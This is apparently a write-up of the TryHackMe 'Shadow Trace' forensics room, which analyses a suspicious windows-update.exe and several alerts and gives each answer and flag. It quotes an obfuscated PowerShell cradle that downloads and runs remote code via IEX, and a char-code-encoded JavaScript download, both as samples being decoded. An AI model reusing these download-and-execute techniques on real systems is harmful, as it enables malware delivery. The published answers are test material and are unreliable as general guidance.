# Shadow Trace — TryHackMe ### Description Analyse a suspicious file, uncover hidden clues, and trace the source of the infection. Helpful resources used to give an overview of required tools for each purpose - [https://learn.microsoft.com/en-us/sysinternals/](https://learn.microsoft.com/en-us/sysinternals/) # Task 2 - File Analysis #### Note - Analyse the binary located `C:\Users\DFIRUser\Desktop\windows-update.exe` ## What is the architecture of the binary file windows-update.exe? Using the tool **Process Explorer** ![Pasted image 20251011105246](https://hackmd.io/_uploads/Sk3Rqj_pgx.png) After opening the process in **Process Explorer** and inspecting `windows-update.exe`, the Environment tab shows: ``` PROCESSOR_ARCHITECTURE = AMD64 ``` This indicates the process is running natively as AMD64 (x64), i.e. **64-bit**. ![Pasted image 20251011111128](https://hackmd.io/_uploads/BJIxoo_pxg.png) **`Answer: 64-bit`** ## What is the hash (sha-256) of the file windows-update.exe? Using **sigcheck** from `C:\Users\DFIRUser\DFIR Tools\SysinternalsSuite` Command: ```cmd sigcheck -h C:\Users\DFIRUser\Desktop\windows-update.exe ``` Where `-h` shows file hashes. Answer: ![Pasted image 20251011113728](https://hackmd.io/_uploads/rJxMjiuagl.png) ## Identify the URL within the file to use it as an IOC You can extract strings from the binary to locate embedded URLs. You can run: ```cmd strings C:\Users\DFIRUser\Desktop\windows-update.exe ``` Alternatively, Process Explorer’s strings view on the running process provides a dynamic way to inspect embedded text. Open the process and inspect the strings. ![Pasted image 20251011114431](https://hackmd.io/_uploads/rJTGosuagg.png) **Answer: `http://tryhatme.com/update/security-update.exe`** ## With the URL identified, can you spot a domain that can be used as an IOC? ![Pasted image 20251011120847](https://hackmd.io/_uploads/HJomsjOpge.png) **Answer: `responses.tryhatme.com`** ## Input the decoded flag from the suspicious domain ![Pasted image 20251011115214](https://hackmd.io/_uploads/BJU4ioOaxg.png) ![Pasted image 20251011115247](https://hackmd.io/_uploads/HyMrji_Tle.png) **Answer: `THM{you_g0t_some_IOCs_friend}`** ## What library related to socket communication is loaded by the binary? Tool - **Listdlls** (Sysinternals) **Answer: `Ws2_32.dll`** # Task 3 - Alerts Analysis ![Pasted image 20251011130118](https://hackmd.io/_uploads/S1bLss_pge.png) ## Can you identify the malicious URL from the trigger by the process powershell.exe? PowerShell command observed: ```powershell (new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl"))) | IEX; ``` The PowerShell command uses Base64 decoding to deobfuscate the embedded string. Decoding the Base64 reveals the malicious URL. ![Pasted image 20251011125801](https://hackmd.io/_uploads/rk1wji_all.png) **Answer: `https://tryhatme.com/dev/main.exe`** ## Can you identify the malicious URL from the alert triggered by chrome.exe? JavaScript snippet observed: ```javascript fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=>String.fromCharCode(c)).join('')).then(r=>r.blob()).then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;a.download='test.txt';document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);}); ``` The array of character codes decodes to the URL: **Answer: `https://reallysecureupdate.tryhatme.com/update.exe`** ## What's the name of the file saved in the alert triggered by chrome.exe? **Answer: `test.txt`**